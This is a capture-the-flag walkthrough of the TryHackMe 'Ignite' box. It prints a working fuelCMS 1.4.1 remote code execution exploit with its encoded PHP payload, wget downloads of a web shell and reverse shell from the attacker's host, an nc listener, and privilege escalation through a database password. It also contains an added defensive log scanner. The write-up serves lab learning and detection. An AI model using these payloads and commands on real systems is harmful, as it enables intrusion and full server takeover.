TryHackMe - Ignite
Enumeration
nmap
root@kali:~/Security/TryHackMe/ignite# portscan 10.10.164.23
Open ports: 80
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-30 16:05 EDT
Nmap scan report for 10.10.164.23
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-title: Welcome to FUEL CMS
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.52 seconds
HTTP
Navigating to http://10.10.164.23/, we get a Getting Started page for Fuel CMS with some useful information on how the database is set up. However, /fuel/application/config/database.php is forbidden with our permissions. robots.txt already told us about /fuel/, but the home page explicitly tells us:
To access the FUEL admin, go to:
http://10.10.164.23/fuel
User name: admin
Password: admin (you can and should change this password and admin user information after logging in)
At http://10.10.164.23/fuel, we have a login form which opens with the provided admin:admin credentials. Based on the site docs, we have a couple of places to try setting up a reverse shell: Pages, Layouts, and Assets.
Before we go too far, let’s search for an exploit for fuelCMS v1.4:
root@kali:~/Security/TryHackMe/ignite# searchsploit fuelCMS
------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------- ----------------------------------------
fuelCMS 1.4.1 - Remote Code Execution | exploits/linux/webapps/47138.py
------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
After copying the exploit to our working directory, we need to change the url
variable and comment out the provided proxy since we aren’t using Burp Suite.
# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
# Note: this is a Python 2 script (raw_input, print statement, urllib.quote)
import requests
import urllib

# url = "http://127.0.0.1:8881"
url = "http://10.10.164.23"   # changed from the exploit-db default to the target box

def find_nth_overlapping(haystack, needle, n):
    # Position of the n-th occurrence of needle in haystack, or -1 if absent
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
    xxxx = raw_input('cmd:')
    burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
    # proxy = {"http":"http://127.0.0.1:8080"}   # Burp proxy commented out, not in use
    # r = requests.get(burp0_url, proxies=proxy)
    r = requests.get(burp0_url)
    html = "<!DOCTYPE html>"
    htmlcharset = r.text.find(html)
    # Cut the output at the second occurrence of its first 20 characters
    begin = r.text[0:20]
    dup = find_nth_overlapping(r.text,begin,2)
    print r.text[0:dup]
Gaining RCE Access
The script works, but prints out unnecessary HTML. It’s a bit clunky, but we can confirm we are www-data and grab the user flag from /home/www-data/flag.txt. Since the script is clunky and the connection keeps dropping, we should use phpbash.php instead.
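As an added defender-side example (not part of the original write-up), the Python below scans Apache access-log lines for the request shape this exploit produces: a GET to /fuel/pages/select/ whose filter parameter decodes to PHP code. The log lines are constructed samples; the attacker IP and the CVE number are the ones mentioned above.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed Apache combined-log samples (not taken from the write-up). Line 1 mirrors
# the request shape of the fuelCMS 1.4.1 RCE (CVE-2018-16763); the rest are benign.
SAMPLE_LOG = """\
10.2.37.2 - - [31/Aug/2020:14:00:12 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27id%27%29%2b%27 HTTP/1.1" 200 5120 "-" "python-requests/2.22.0"
10.2.37.2 - - [31/Aug/2020:14:01:59 +0000] "GET /fuel/pages/select/?filter=news HTTP/1.1" 200 3104 "-" "Mozilla/5.0"
10.2.37.2 - - [31/Aug/2020:14:02:03 +0000] "GET /fuel/login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A page filter should be a plain search string; PHP calls such as pi(, print(, system(
# or a variable-function call like $a('...') (the shape of the exploit payload) are not.
CODE_RE = re.compile(r"\$\w+\s*\(|\b(?:pi|print|system|exec|shell_exec|passthru|popen|eval)\s*\(")

def decode_param(value, rounds=2):
    """Percent-decode up to `rounds` times so a double-encoded payload is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a finding dict when the line matches the exploit's request shape, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.startswith("/fuel/pages/select"):
        return None
    # parse_qs already decodes once; decode_param handles any extra layer.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("filter", []):
        decoded = decode_param(raw)
        if CODE_RE.search(decoded):
            return {"ip": m.group("ip"), "ts": m.group("ts"),
                    "status": m.group("status"), "filter": decoded}
    return None

def scan_access_log(text):
    """Run inspect_line over every line and keep the hits."""
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))
```

A 200 status on a flagged line means the filter value reached the server, so the host should be treated as compromised rather than merely probed.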
Getting a Shell
# Attacker
root@kali:~/scripts/phpbash# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.164.23 - - [31/Aug/2020 14:01:59] "GET /phpbash.php HTTP/1.1" 200 -
# Victim
cmd:"wget http://10.2.37.2:8000/phpbash.php"
Navigate to http://10.10.164.23/phpbash.php:
www-data@ubuntu:/var/www/html# cat /home/www-data/flag.txt
{censored}
Escalating Privileges
We were told that the database config file can be found in fuel/application/config/database.php, so let’s see if we can grab some credentials.
www-data@ubuntu:/var/www/html# cat /fuel/application/config/database.php
...
$db['default'] = array(
'dsn' => '',
'hostname' => 'localhost',
'username' => 'root',
'password' => 'mememe',
'database' => 'fuel_schema',
'dbdriver' => 'mysqli',
...
www-data@ubuntu:/var/www/html# su root
su: must be run from a terminal
We may have root credentials, but we cannot check yet, since su must be run from a TTY and we need to spawn one first. phpbash.php was fun but is pretty unstable, so let’s wget a standard reverse shell instead.
root@kali:~/scripts# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.164.23 - - [31/Aug/2020 15:10:02] "GET /php-reverse-shell.php HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
root@kali:~/scripts# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.2.37.2] from (UNKNOWN) [10.10.164.23] 47428
Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
12:14:27 up 1:23, 0 users, load average: 1.02, 0.98, 0.91
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@ubuntu:/$ su root
su root
Password: mememe
root@ubuntu:/# cat /root/root.txt
cat /root/root.txt
{censored}
I hope you enjoyed the walkthrough.